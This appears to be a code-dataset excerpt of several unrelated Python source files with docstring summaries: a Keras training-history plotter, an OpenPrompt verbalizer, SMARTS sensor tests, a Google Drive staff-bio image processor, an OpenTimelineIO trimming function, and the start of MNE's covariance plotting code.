template = "An exception of type {0} occurred in [HistoryPlotter.OldPlotHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def AccOrLossPlot(self, fig_num:int, title:str, metric:str, axis_labels:list = ['train', 'validation'], history_labels:list = ['Metric', 'Epoch'], extender:str = '_epoch_plot', train_val_lists:list = None):
"""
This method wrapp the plot creation for a single metric of the keras train history.
:param fig_num:int: figure number
:param title:str: figure title
:param metric:str: desired metric
:param axis_labels:list: axis labels
:param history_labels:list: history labels
:param extender:str: plot file name extender
:param train_val_lists:list: a list containing the train and validation list of a defined metric
"""
try:
figure = plt.figure(fig_num)
plt.suptitle(title, fontsize=14, fontweight='bold')
if metric == 'loss': plt.title(self.CalcResultLoss(history=self._history))
else: plt.title(self.CalcResultAccuracy(history=self._history, metric=metric))
if not self._new_style:
plt.plot(self._history.history[metric], color='blue', label=axis_labels[0])
plt.plot(self._history.history['val_' + metric], color='orange', label=axis_labels[1])
else:
if (train_val_lists != None) and (len(train_val_lists) == 2):
for l in train_val_lists[0]: plt.plot(self._epochs, self._history.history[l], color='b', label='Training ' + metric + ' (' + str(format(self._history.history[l][-1],'.5f'))+')')
for l in train_val_lists[1]: plt.plot(self._epochs, self._history.history[l], color='g', label='Validation ' + metric + ' (' + str(format(self._history.history[l][-1],'.5f'))+')')
plt.ylabel(history_labels[0])
plt.xlabel(history_labels[1])
plt.legend(axis_labels, loc='lower right')
if self._save_it:
PlotSaver(self._model_description, figure).SavePyPlotToFile(extender=extender)
else:
plt.show()
figure.clf()
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.AccOrLossPlot]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def LearningPlot(self, fig_num:int, title:str = 'Model Learning Rate', metric:str = 'lr', axis_labels:list = ['train', 'validation'], history_labels:list = ['Learning Rate', 'Epoch'], extender:str = 'learning_rate_epoch_plot'):
"""
This method plot a the single learning rate curve.
:param fig_num:int: figure number
:param title:str: figure title
:param metric:str: desired metric
:param axis_labels:list: axis labels
:param history_labels:list: history labels
:param extender:str: plot file name extender
"""
try:
figure = plt.figure(fig_num)
plt.suptitle(title, fontsize=14, fontweight='bold')
plt.title(self.CalcResultLearnRate(history=self._history))
if not self._new_style:
plt.plot(self._history.history[metric], color='red', label='learning rate')
else:
for l in self._learning_rates: plt.plot(self._epochs, self._history.history[l], color='r', label='Learning Rate (' + str(format(self._history.history[l][-1],'.5f'))+')')
plt.ylabel(history_labels[0])
plt.xlabel(history_labels[1])
plt.legend(axis_labels, loc='upper right')
if self._save_it:
PlotSaver(self._model_description, figure).SavePyPlotToFile(extender='learning_rate_epoch_plot')
else:
plt.show()
figure.clf()
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.LearningPlot]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CalcResultAccuracy(self, history, metric:str = 'acc'):
"""
This method show the train acc results.
:param history: history of the training
"""
try:
return "Training accuracy: %.2f%% / Validation accuracy: %.2f%%" % (100*history.history[metric][-1], 100*history.history['val_'+metric][-1])
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CalcResultAccuracy]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CalcResultLoss(self, history):
"""
This method show the train loss results.
:param history: history of the training
"""
try:
return 'Training loss: '+ str(history.history['loss'][-1])[:-6] +' / Validation loss: ' + str(history.history['val_loss'][-1])[:-6]
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CalcResultLoss]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CalcResultLearnRate(self, history):
"""
This method show the train learn rate.
:param history: history of the training
"""
try:
return 'Training Learn Rate: '+ str(history.history['lr'][-1])
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CalcResultLearnRate]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
| Scripts/Plotter/PlotHistory.py | 18,766 | This class provides a History plotting pipeline using mathplot.
This method wrapp the plot creation for a single metric of the keras train history.
:param fig_num:int: figure number
:param title:str: figure title
:param metric:str: desired metric
:param axis_labels:list: axis labels
:param history_labels:list: history labels
:param extender:str: plot file name extender
:param train_val_lists:list: a list containing the train and validation list of a defined metric
This method show the train acc results.
:param history: history of the training
This method show the train learn rate.
:param history: history of the training
This method show the train loss results.
:param history: history of the training
This method collect the accuracy data from the history into 2 lists.
:param name:str: name of the used acc metric
This method collect all necessary train informations from the history.
This method collect the learning rate metric data from the history.
This method collect the loss metric data from the history.
This method helps to plot a keras history containing losses, accuracy and possibly least learning rates.
This method plot a the single learning rate curve.
:param fig_num:int: figure number
:param title:str: figure title
:param metric:str: desired metric
:param axis_labels:list: axis labels
:param history_labels:list: history labels
:param extender:str: plot file name extender
This method plot the history in the old way.
Thise method allow to plot a history from directly a keras history.
Plotting from log is not yet implemented!
The class constructor.
Attention: File history plotting is not yet implemented!
:param model_description:str: something to name the image unique and is also the file name
:param path:str: path of a file containing a history
:param history: a history
:param save_it:bool: save the plot instead of showing
:param new_style:bool: desired matplot lib standard or new style
This for a later implemented part of the toolTODO: Log file history plotting is not yet implementedelse: self.PlotHistoryFromLog() Loss Top k Categorical Crossentropy Categorical Crossentropy General | 2,221 | en | 0.780908 |
import json
from transformers.tokenization_utils import PreTrainedTokenizer
from yacs.config import CfgNode
from openprompt.data_utils import InputFeatures
import re
from openprompt import Verbalizer
from typing import *
import torch
import torch.nn as nn
import torch.nn.functional as F
from openprompt.utils.logging import logger
class One2oneVerbalizer(Verbalizer):
r"""
The basic manually defined verbalizer class, this class is inherited from the :obj:`Verbalizer` class.
This class restrict the use of label words to one words per label. For a verbalzer with less constraints,
please use Basic ManualVerbalizer.
Args:
tokenizer (:obj:`PreTrainedTokenizer`): The tokenizer of the current pre-trained model to point out the vocabulary.
classes (:obj:`classes`): The classes (or labels) of the current task.
num_classes (:obj:`int`): Optional. The number of classes of the verbalizer. Only one of `classes` and `num_classes` should be used.
label_words (:obj:`Union[Sequence[str], Mapping[str, str]]`, optional): The label words that are projected by the labels.
prefix (:obj:`str`, optional): The prefix string of the verbalizer. (used in PLMs like RoBERTa, which is sensitive to prefix space)
multi_token_handler (:obj:`str`, optional): The handling strategy for multiple tokens produced by the tokenizer.
post_log_softmax (:obj:`bool`, optional): Whether to apply log softmax post processing on label_logits. Default to True.
"""
def __init__(self,
tokenizer: PreTrainedTokenizer,
num_classes: Optional[int] = None,
classes: Optional[List] = None,
label_words: Optional[Union[Sequence[str], Mapping[str, str]]] = None,
prefix: Optional[str] = " ",
multi_token_handler: Optional[str] = "first",
post_log_softmax: Optional[bool] = True,
):
super().__init__(tokenizer=tokenizer, num_classes=num_classes, classes=classes)
self.prefix = prefix
self.multi_token_handler = multi_token_handler
self.label_words = label_words
self.post_log_softmax = post_log_softmax
def on_label_words_set(self):
super().on_label_words_set()
self.label_words = self.add_prefix(self.label_words, self.prefix)
self.generate_parameters()
@staticmethod
def add_prefix(label_words, prefix):
r"""Add prefix to label words. For example, if a label words is in the middle of a template,
the prefix should be ``' '``.
Args:
label_words (:obj:`Union[Sequence[str], Mapping[str, str]]`, optional): The label words that are projected by the labels.
prefix (:obj:`str`, optional): The prefix string of the verbalizer.
Returns:
:obj:`Sequence[str]`: New label words with prefix.
"""
new_label_words = []
if isinstance(label_words[0], list):
assert max([len(w) for w in label_words]) == 1, "Providing multiple label words, you should use other verbalizers instead."
label_words = [w[0] for w in label_words]
for word in label_words:
if word.startswith("<!>"):
new_label_words.append(word.split("<!>")[1])
else:
new_label_words.append(prefix + word)
return new_label_words
def generate_parameters(self) -> List:
r"""In basic manual template, the parameters are generated from label words directly.
In this implementation, the label_words should not be tokenized into more than one token.
"""
words_ids = []
for word in self.label_words:
word_ids = self.tokenizer.encode(word, add_special_tokens=False)
if len(word_ids) > 1:
logger.warning("Word {} is split into multiple tokens: {}. \
If this is not what you expect, try using another word for this verbalizer" \
.format(word, self.tokenizer.convert_ids_to_tokens(word_ids)))
words_ids.append(word_ids)
max_len = max([len(ids) for ids in words_ids])
words_ids_mask = [[1]*len(ids) + [0]*(max_len-len(ids)) for ids in words_ids]
words_ids = [ids+[0]*(max_len-len(ids)) for ids in words_ids]
words_ids_tensor = torch.tensor(words_ids)
words_ids_mask = torch.tensor(words_ids_mask)
self.label_words_ids = nn.Parameter(words_ids_tensor, requires_grad=False)
self.label_words_mask = nn.Parameter(words_ids_mask, requires_grad=False)
def project(self,
logits: torch.Tensor,
**kwargs,
) -> torch.Tensor:
r"""
Project the labels, the return value is the normalized (sum to 1) probs of label words.
Args:
logits (:obj:`torch.Tensor`): The orginal logits of label words.
Returns:
:obj:`torch.Tensor`: The normalized logits of label words
"""
label_words_logits = logits[:, self.label_words_ids]
label_words_logits = self.handle_multi_token(label_words_logits, self.label_words_mask)
return label_words_logits
def process_logits(self, logits: torch.Tensor, **kwargs):
r"""A whole framework to process the original logits over the vocabulary, which contains four steps:
(1) Project the logits into logits of label words
if self.post_log_softmax is True:
(2) Normalize over all label words
(3) Calibrate (optional)
Args:
logits (:obj:`torch.Tensor`): The orginal logits.
Returns:
(:obj:`torch.Tensor`): The final processed logits over the label words set.
"""
# project
label_words_logits = self.project(logits, **kwargs) #Output: (batch_size, num_classes) or (batch_size, num_classes, num_label_words_per_label)
if self.post_log_softmax:
# normalize
label_words_probs = self.normalize(label_words_logits)
# calibrate
if hasattr(self, "_calibrate_logits") and self._calibrate_logits is not None:
label_words_probs = self.calibrate(label_words_probs=label_words_probs)
# convert to logits
label_words_logits = torch.log(label_words_probs+1e-15)
return label_words_logits
def normalize(self, logits: torch.Tensor) -> torch.Tensor:
"""
Given logits regarding the entire vocabulary, return the probs over the label words set.
Args:
logits (:obj:`Tensor`): The logits over the entire vocabulary.
Returns:
:obj:`Tensor`: The logits over the label words set.
"""
batch_size = logits.shape[0]
return F.softmax(logits.reshape(batch_size, -1), dim=-1).reshape(*logits.shape)
def calibrate(self, label_words_probs: torch.Tensor, **kwargs) -> torch.Tensor:
r"""
Args:
label_words_probs (:obj:`torch.Tensor`): The probability distribution of the label words with the shape of [``batch_size``, ``num_classes``, ``num_label_words_per_class``]
Returns:
:obj:`torch.Tensor`: The calibrated probability of label words.
"""
shape = label_words_probs.shape
assert self._calibrate_logits.dim() == 1, "self._calibrate_logits are not 1-d tensor"
calibrate_label_words_probs = self.normalize(self.project(self._calibrate_logits.unsqueeze(0), **kwargs))
assert calibrate_label_words_probs.shape[1:] == label_words_probs.shape[1:] \
and calibrate_label_words_probs.shape[0]==1, "shape not match"
label_words_probs /= (calibrate_label_words_probs+1e-15)
# normalize # TODO Test the performance
norm = label_words_probs.reshape(shape[0], -1).sum(dim=-1,keepdim=True) # TODO Test the performance of detaching()
label_words_probs /= norm
return label_words_probs
| openprompt/prompts/one2one_verbalizer.py | 8,050 | The basic manually defined verbalizer class, this class is inherited from the :obj:`Verbalizer` class.
This class restrict the use of label words to one words per label. For a verbalzer with less constraints,
please use Basic ManualVerbalizer.
Args:
tokenizer (:obj:`PreTrainedTokenizer`): The tokenizer of the current pre-trained model to point out the vocabulary.
classes (:obj:`classes`): The classes (or labels) of the current task.
num_classes (:obj:`int`): Optional. The number of classes of the verbalizer. Only one of `classes` and `num_classes` should be used.
label_words (:obj:`Union[Sequence[str], Mapping[str, str]]`, optional): The label words that are projected by the labels.
prefix (:obj:`str`, optional): The prefix string of the verbalizer. (used in PLMs like RoBERTa, which is sensitive to prefix space)
multi_token_handler (:obj:`str`, optional): The handling strategy for multiple tokens produced by the tokenizer.
post_log_softmax (:obj:`bool`, optional): Whether to apply log softmax post processing on label_logits. Default to True.
Add prefix to label words. For example, if a label words is in the middle of a template,
the prefix should be ``' '``.
Args:
label_words (:obj:`Union[Sequence[str], Mapping[str, str]]`, optional): The label words that are projected by the labels.
prefix (:obj:`str`, optional): The prefix string of the verbalizer.
Returns:
:obj:`Sequence[str]`: New label words with prefix.
Args:
label_words_probs (:obj:`torch.Tensor`): The probability distribution of the label words with the shape of [``batch_size``, ``num_classes``, ``num_label_words_per_class``]
Returns:
:obj:`torch.Tensor`: The calibrated probability of label words.
In basic manual template, the parameters are generated from label words directly.
In this implementation, the label_words should not be tokenized into more than one token.
Given logits regarding the entire vocabulary, return the probs over the label words set.
Args:
logits (:obj:`Tensor`): The logits over the entire vocabulary.
Returns:
:obj:`Tensor`: The logits over the label words set.
A whole framework to process the original logits over the vocabulary, which contains four steps:
(1) Project the logits into logits of label words
if self.post_log_softmax is True:
(2) Normalize over all label words
(3) Calibrate (optional)
Args:
logits (:obj:`torch.Tensor`): The orginal logits.
Returns:
(:obj:`torch.Tensor`): The final processed logits over the label words set.
Project the labels, the return value is the normalized (sum to 1) probs of label words.
Args:
logits (:obj:`torch.Tensor`): The orginal logits of label words.
Returns:
:obj:`torch.Tensor`: The normalized logits of label words
projectOutput: (batch_size, num_classes) or (batch_size, num_classes, num_label_words_per_label) normalize calibrate convert to logits normalize TODO Test the performance TODO Test the performance of detaching() | 2,992 | en | 0.657458 |
# MIT License
#
# Copyright (C) 2021. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from unittest import mock
import numpy as np
import pytest
from helpers.scenario import temp_scenario
from smarts.core.agent_interface import AgentInterface
from smarts.core.coordinates import Heading, Pose
from smarts.core.plan import Plan
from smarts.core.scenario import Scenario
from smarts.core.sensors import DrivenPathSensor, WaypointsSensor
from smarts.sstudio import gen_scenario
from smarts.sstudio import types as t
AGENT_ID = "Agent-007"
def test_driven_path_sensor():
vehicle = mock.Mock()
sim = mock.Mock()
max_path_length = 5
sensor = DrivenPathSensor(vehicle, max_path_length=max_path_length)
positions = [(x, 0, 0) for x in range(0, 100, 10)]
sim_times = list(range(0, 50, 5))
for idx, (position, sim_time) in enumerate(zip(positions, sim_times)):
sim.elapsed_sim_time = sim_time
vehicle.position = position
sensor.track_latest_driven_path(sim)
if idx >= 3:
assert sensor.distance_travelled(sim, last_n_steps=3) == 30
assert sensor.distance_travelled(sim, last_n_seconds=10) == 20
assert len(sensor()) <= max_path_length
sensor.teardown()
@pytest.fixture
def scenarios():
with temp_scenario(name="straight", map="maps/6lane.net.xml") as scenario_root:
ego_missions = [
t.Mission(
t.Route(
begin=("edge-west-WE", 0, 10),
end=("edge-east-WE", 0, "max"),
)
),
]
gen_scenario(
t.Scenario(ego_missions=ego_missions),
output_dir=scenario_root,
)
yield Scenario.variations_for_all_scenario_roots(
[str(scenario_root)], [AGENT_ID]
)
def test_waypoints_sensor(scenarios):
scenario = next(scenarios)
sim = mock.Mock()
vehicle = mock.Mock()
vehicle.pose = Pose(
position=np.array([33, -65, 0]),
orientation=[0, 0, 0, 0],
heading_=Heading(0),
)
mission = scenario.missions[AGENT_ID]
plan = Plan(scenario.road_map, mission)
sensor = WaypointsSensor(vehicle, plan)
waypoints = sensor()
assert len(waypoints) == 3
| smarts/core/tests/test_sensors.py | 3,324 | MIT License Copyright (C) 2021. Huawei Technologies Co., Ltd. All rights reserved. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. | 1,103 | en | 0.859904 |
from PIL import Image
import gspread
import hashlib
from googleapiclient.errors import HttpError
from oauth2client.service_account import ServiceAccountCredentials
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from googleapiclient.http import MediaIoBaseDownload
import io
import json
def has_transparency(image: Image) -> bool:
if image.mode == "P":
transparent = image.info.get("transparency", -1)
for _, index in image.getcolors():
if index == transparent:
return True
elif image.mode == "RGBA":
extrema = image.getextrema()
if extrema[3][0] < 255:
return True
return False
# from https://stackoverflow.com/questions/61201141/how-can-i-crop-an-image-with-11-aspect-ratio-using-pillow-in-python
def crop_image(image):
width, height = image.size
if width == height:
return image
offset = int(abs(height - width) / 2)
if width > height:
image = image.crop([offset, 0, width - offset, height])
else:
image = image.crop([0, offset, width, height - offset])
return image
def resize_image(image):
width, height = image.size
new_width = 256
if width < new_width:
return image
new_height = new_width * height / width
return image.resize((new_width, int(new_height)), Image.ANTIALIAS)
def LongestBio(section: list) -> int:
longestBio = 0
for items in section:
if longestBio < len(items["description"]):
longestBio = len(items["description"])
return longestBio
def sortBioLength(bioList: list) -> list:
holdingList = []
workingList = bioList
for x in range(len(workingList)):
highest = LongestBio(workingList)
itemIndex = -1
for items in workingList:
itemIndex = itemIndex + 1
if len(items["description"]) == highest:
holdingList.append(items)
break
if itemIndex != -1:
del workingList[itemIndex]
return holdingList
# Deals with getting all the auth setup for the connecting to GSheet
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
# Needs to link to auth file given by google dev dashboard
creds = ServiceAccountCredentials.from_json_keyfile_name("secrets/googleAuth.json", scope)
client = gspread.authorize(creds)
sheet = client.open("Low Ink Staff Bio Form (Responses)") # Name of the google sheet file
worksheet = sheet.worksheet("input") # name of the sheet in question
worksheetData = worksheet.get_all_records()
# This is the auth scope for Google Drive API
creds = None
if os.path.exists('secrets/token.pickle'):
with open('secrets/token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'secrets/credentials.json', ['https://www.googleapis.com/auth/drive'])
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('secrets/token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('drive', 'v3', credentials=creds)
commentator = []
former = []
headTO = []
orgHead = []
production = []
staff = []
artists = []
for lines in worksheetData:
output = {}
if lines["isStaff"] in ["Yes (Staff temp invite)", "Yes", "Yes (Staff, temp, invite)"]:
print("Outputting for: {}".format(lines["name"]))
staffID = hashlib.md5(lines["name"].encode("utf-8")).hexdigest()
# Obtains image from google drive
imageID = (lines["image"].split("?id="))[1] # get the G Drive file ID from share
request = service.files().get_media(fileId=imageID)
fh = io.FileIO("holding/{}.png".format(staffID), "wb") # states where the file saves to
# Downloads file
downloader = MediaIoBaseDownload(fh, request)
output_file_format = 'png'
done = False
while done is False:
try:
status, done = downloader.next_chunk()
except HttpError as e:
print("Could not output image. Please provide file '{}' manually.".format("output/images/{}.png").format(staffID))
print("Error message: '{}'".format(e.error_details[0]["message"]))
break
if done is True:
# Crops image to be 1:1
staff_image = crop_image(Image.open("holding/{}.png".format(staffID)))
staff_image = resize_image(staff_image)
if has_transparency(staff_image):
staff_image.convert("P", palette=Image.ADAPTIVE).save("output/images/{}.png".format(staffID))
else:
staff_image.convert("RGB", palette=Image.ADAPTIVE).save("output/images/{}.jpg".format(staffID))
output_file_format = 'jpg'
staff_image.close()
output = {
"title": lines["name"],
"description": (lines["bio"].replace("\n", "")).replace("\r", " "),
"imagePath": "images/Staff/{}.{}".format(staffID, output_file_format),
"twitter": lines["twitter"],
"credit": lines["credits"]
}
# Save bio to right list
if lines["header"] == "General Staff":
staff.append(output)
elif lines["header"] == "Commentators":
commentator.append(output)
elif lines["header"] == "Head TO":
headTO.append(output)
elif lines["header"] == "Production & Development":
production.append(output)
elif lines["header"] == "Org Head":
orgHead.append(output)
elif lines["header"] == "Temp staff":
staff.append(output)
elif lines["header"] == "Former staff":
former.append(output)
elif lines["header"] == "Guest Staff":
staff.append(output)
elif lines["header"] == "Artist":
artists.append(output)
staffFile = [
{"elemClassName": "staff-layout-grid",
"contents": sortBioLength(staff)},
{"elemClassName": "org-head-grid",
"contents": sortBioLength(orgHead)},
{"elemClassName": "head-TO-grid",
"contents": sortBioLength(headTO)},
{"elemClassName": "production-grid",
"contents": sortBioLength(production)},
{"elemClassName": "commentator-grid",
"contents": sortBioLength(commentator)},
{"elemClassName": "former-staff-grid",
"contents": sortBioLength(former)},
{"elemClassName": "artists-staff-grid",
"contents": sortBioLength(artists)}
]
with open('output/staff.json', 'w') as file:
json.dump(staffFile, file)
| dataProcessor/processBio.py | 6,955 | from https://stackoverflow.com/questions/61201141/how-can-i-crop-an-image-with-11-aspect-ratio-using-pillow-in-python Deals with getting all the auth setup for the connecting to GSheet Needs to link to auth file given by google dev dashboard Name of the google sheet file name of the sheet in question This is the auth scope for Google Drive API If there are no (valid) credentials available, let the user log in. Save the credentials for the next run Obtains image from google drive get the G Drive file ID from share states where the file saves to Downloads file Crops image to be 1:1 Save bio to right list | 609 | en | 0.875758 |
#
# Copyright Contributors to the OpenTimelineIO project
#
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
#
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
#
# You may obtain a copy of the Apache License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
#
"""Algorithms for timeline objects."""
import copy
from . import (
track_algo
)
def timeline_trimmed_to_range(in_timeline, trim_range):
"""Returns a new timeline that is a copy of the in_timeline, but with items
outside the trim_range removed and items on the ends trimmed to the
trim_range. Note that the timeline is never expanded, only shortened.
Please note that you could do nearly the same thing non-destructively by
just setting the Track's source_range but sometimes you want to really cut
away the stuff outside and that's what this function is meant for."""
new_timeline = copy.deepcopy(in_timeline)
for track_num, child_track in enumerate(in_timeline.tracks):
# @TODO: put the trim_range into the space of the tracks
# new_range = new_timeline.tracks.transformed_time_range(
# trim_range,
# child_track
# )
# trim the track and assign it to the new stack.
new_timeline.tracks[track_num] = track_algo.track_trimmed_to_range(
child_track,
trim_range
)
return new_timeline
| src/py-opentimelineio/opentimelineio/algorithms/timeline_algo.py | 2,216 | Returns a new timeline that is a copy of the in_timeline, but with items
outside the trim_range removed and items on the ends trimmed to the
trim_range. Note that the timeline is never expanded, only shortened.
Please note that you could do nearly the same thing non-destructively by
just setting the Track's source_range but sometimes you want to really cut
away the stuff outside and that's what this function is meant for.
Algorithms for timeline objects.
Copyright Contributors to the OpenTimelineIO project Licensed under the Apache License, Version 2.0 (the "Apache License") with the following modification; you may not use this file except in compliance with the Apache License and the following modification to it: Section 6. Trademarks. is deleted and replaced with: 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor and its affiliates, except as required to comply with Section 4(c) of the License and to reproduce the content of the NOTICE file. You may obtain a copy of the Apache License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the Apache License with the above modification is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the Apache License for the specific language governing permissions and limitations under the Apache License. @TODO: put the trim_range into the space of the tracks new_range = new_timeline.tracks.transformed_time_range( trim_range, child_track ) trim the track and assign it to the new stack. | 1,697 | en | 0.887729 |
# -*- coding: utf-8 -*-
"""Functions to make simple plots with M/EEG data."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Denis Engemann <denis.engemann@gmail.com>
# Martin Luessi <mluessi@nmr.mgh.harvard.edu>
# Eric Larson <larson.eric.d@gmail.com>
# Cathy Nangini <cnangini@gmail.com>
# Mainak Jas <mainak@neuro.hut.fi>
#
# License: Simplified BSD
import base64
import copy
from glob import glob
from io import BytesIO
from itertools import cycle
import os.path as op
import warnings
from distutils.version import LooseVersion
from collections import defaultdict
import numpy as np
from scipy import linalg
from ..defaults import DEFAULTS
from ..fixes import _get_img_fdata
from ..rank import compute_rank
from ..source_space import _mri_orientation
from ..surface import read_surface
from ..io.constants import FIFF
from ..io.proj import make_projector
from ..io.pick import (_DATA_CH_TYPES_SPLIT, pick_types, pick_info,
pick_channels)
from ..source_space import (read_source_spaces, SourceSpaces, _read_mri_info,
_check_mri, _ensure_src)
from ..transforms import invert_transform, apply_trans, _frame_to_str
from ..utils import (logger, verbose, warn, _check_option, get_subjects_dir,
_mask_to_onsets_offsets, _pl, _on_missing)
from ..io.pick import _picks_by_type
from ..filter import estimate_ringing_samples
from .utils import tight_layout, _get_color_list, _prepare_trellis, plt_show
def _index_info_cov(info, cov, exclude):
if exclude == 'bads':
exclude = info['bads']
info = pick_info(info, pick_channels(info['ch_names'], cov['names'],
exclude))
del exclude
picks_list = \
_picks_by_type(info, meg_combined=False, ref_meg=False,
exclude=())
picks_by_type = dict(picks_list)
ch_names = [n for n in cov.ch_names if n in info['ch_names']]
ch_idx = [cov.ch_names.index(n) for n in ch_names]
info_ch_names = info['ch_names']
idx_by_type = defaultdict(list)
for ch_type, sel in picks_by_type.items():
idx_by_type[ch_type] = [ch_names.index(info_ch_names[c])
for c in sel if info_ch_names[c] in ch_names]
idx_names = [(idx_by_type[key],
'%s covariance' % DEFAULTS['titles'][key],
DEFAULTS['units'][key],
DEFAULTS['scalings'][key],
key)
for key in _DATA_CH_TYPES_SPLIT
if len(idx_by_type[key]) > 0]
C = cov.data[ch_idx][:, ch_idx]
return info, C, ch_names, idx_names
@verbose
def plot_cov(cov, info, exclude=(), colorbar=True, proj=False, show_svd=True,
show=True, verbose=None):
"""Plot Covariance data.
Parameters
----------
cov : instance of Covariance
The covariance matrix.
info : dict
Measurement info.
exclude : list of str | str
List of channels to exclude. If empty do not exclude any channel.
If 'bads', exclude info['bads'].
colorbar : bool
Show colorbar or not.
proj : bool
Apply projections or not.
show_svd : bool
Plot also singular values of the noise covariance for each sensor
type. We show square roots ie. standard deviations.
show : bool
Show figure if True.
%(verbose)s
Returns
-------
fig_cov : instance of matplotlib.figure.Figure
The covariance plot.
fig_svd : instance of matplotlib.figure.Figure | None
The SVD spectra plot of the covariance.
See Also
--------
mne.compute_rank
Notes
-----
For each channel type, the rank is estimated using
:func:`mne.compute_rank`.
.. versionchanged:: 0.19
Approximate ranks for each channel type are shown with red dashed lines.
"""
from ..cov import Covariance
import matplotlib.pyplot as plt
from matplotlib.colors import Normalize
info, C, ch_names, idx_names = _index_info_cov(info, cov, exclude)
del cov, exclude
projs = []
if proj:
projs = copy.deepcopy(info['projs'])
# Activate the projection items
for p in projs:
p['active'] = True
P, ncomp, _ = make_projector(projs, ch_names)
if ncomp > 0:
logger.info(' Created an SSP operator (subspace dimension'
' = %d)' % ncomp)
C = np.dot(P, np.dot(C, P.T))
else:
logger.info(' The projection vectors do not apply to these '
'channels.')
fig_cov, axes = plt.subplots(1, len(idx_names), squeeze=False,
figsize=(3.8 * len(idx_names), 3.7))
for k, (idx, name, _, _, _) in enumerate(idx_names):
vlim = np.max(np.abs(C[idx][:, idx]))
im = axes[0, k].imshow(C[idx][:, idx], interpolation="nearest",
norm=Normalize(vmin=-vlim, vmax=vlim),
cmap='RdBu_r')
axes[0, k].set(title=name)
if colorbar:
from mpl_toolkits.axes_grid1 import make_axes_locatable
divider = make_axes_locatable(axes[0, k])
cax = divider.append_axes("right", size="5.5%", pad=0.05)
plt.colorbar(im, cax=cax, format='%.0e')
fig_cov.subplots_adjust(0.04, 0.0, 0.98, 0.94, 0.2, 0.26)
tight_layout(fig=fig_cov)
fig_svd = None
if show_svd:
fig_svd, axes = plt.subplots(1, len(idx_names), squeeze=False,
figsize=(3.8 * len(idx_names), 3.7))
for k, (idx, name, unit, scaling, key) in enumerate(idx_names):
this_C = C[idx][:, idx]
s = linalg.svd(this_C, compute_uv=False)
this_C = Covariance(this_C, [info['ch_names'][ii] for ii in idx],
[], [], 0)
this_info = pick_info(info, idx)
this_info['projs'] = []
this_rank = compute_rank(this_C, info=this_info)
# Protect against true zero singular values
s[s <= 0] = 1e-10 * s[s > 0].min()
s = np.sqrt(s) * scaling
